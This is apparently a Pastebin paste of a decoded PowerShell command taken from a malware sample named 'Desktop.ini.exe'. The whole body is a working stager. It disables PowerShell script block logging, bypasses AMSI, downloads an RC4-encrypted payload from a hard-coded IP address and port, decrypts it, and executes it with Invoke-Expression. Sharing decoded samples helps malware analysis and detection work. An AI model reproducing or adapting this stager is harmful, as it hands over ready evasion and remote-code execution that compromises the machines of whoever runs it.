Advertisement
Fare9

Desktop.ini.exe powershell base64 decoded command

Feb 28th, 2019
677
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 1.87 KB | None | 0 0
  1. IF($PSVERsIONTablE.PSVERSIOn.Major -gE 3)
  2. {
  3. $GPF=[reF].ASseMBLY.GetTYpE('System.Management.Automation.Utils')."GETFie`Ld"('cachedGroupPolicySettings','N'+'onPublic,Static');
  4.  
  5. If($GPF)
  6. {
  7. $GPC=$GPF.GetValuE($nULl);
  8. IF($GPC['ScriptB'+'lockLogging'])
  9. {
  10. $GPC['ScriptB'+'lockLogging']['EnableScriptB'+'lockLogging']=0;
  11. $GPC['ScriptB'+'lockLogging']['EnableScriptBlockInvocationLogging']=0
  12. }
  13.  
  14. $vAL=[CoLleCTionS.GeNeRic.DICTionARy[sTrINg,SYStem.OBJECt]]::nEw();
  15. $vAL.ADD('EnableScriptB'+'lockLogging',0);
  16. $VaL.ADd('EnableScriptBlockInvocationLogging',0);
  17. $GPC['HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\PowerShell\ScriptB'+'lockLogging']=$Val
  18. }
  19. ELse
  20. {
  21. [ScrIpTBlocK]."GETFIe`Ld"('signatures','N'+'onPublic,Static').SEtVALUE($null,(New-ObjEctCOlLECTioNs.GeNERIC.HaShSET[strInG]))
  22. }
  23.  
  24. [ReF].AsSemBly.GeTTYPe('System.Management.Automation.AmsiUtils')|?{ $_ }| %{$_.GetFIelD('amsiInitFailed','NonPublic,Static').SETVaLue($Null,$truE)};
  25. };
  26.  
  27. [SYstem.NEt.SERviCePoiNtMAnAgEr]::ExPECT100ConTiNue=0;
  28. $wc=New-OBjeCTSystEM.Net.WEbClient;
  29. $u='Mozilla/5.0(WindowsNT6.1;WOW64;Trident/7.0;rv:11.0)likeGecko';
  30. $Wc.HeaDErS.AdD('User-Agent',$u);
  31. $wC.PrOXy=[SYSTem.NeT.WEbRequESt]::DeFAUltWEBProXY;
  32. $Wc.PrOXY.CREdENTIAlS=[SYStem.NEt.CredENtIALCAChe]::DEfAuLtNeTwoRkCREDeNtIALS;
  33. $Script:Proxy=$wc.Proxy;
  34. $K=[SysteM.TeXt.EnCoDIng]::ASCII.GETBYTEs('81c3b080dad537de7e10e0987a4bf52e');
  35. $R={
  36. $D,$K=$ARGs;
  37. $S=0..255;
  38. 0..255|% {
  39. $J=($J+$S[$_]+$K[$_%$K.Count])%256;
  40. $S[$_],$S[$J]=$S[$J],$S[$_]
  41. };
  42. $D|%{
  43. $I=($I+1)%256;
  44. $H=($H+$S[$I])%256;
  45. $S[$I],$S[$H]=$S[$H],$S[$I];
  46. $_-BXOr$S[($S[$I]+$S[$H])%256]
  47. }
  48. };
  49. $ser='http://46.29.163.222:9999';
  50. $t='/admin/get.php';
  51. $wC.HEAdeRs.ADD("Cookie","session=jbWUS4FOkzKjPDqMrYuDTzCiaVY=");
  52. $dATa=$WC.DownLoADDAtA($ser+$T);
  53. $iv=$DaTa[0..3];
  54. $Data=$DAtA[4..$DaTA.lENGTH];
  55. -JOIN[ChAR[]](&$R$daTa($IV+$K))|IEX
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement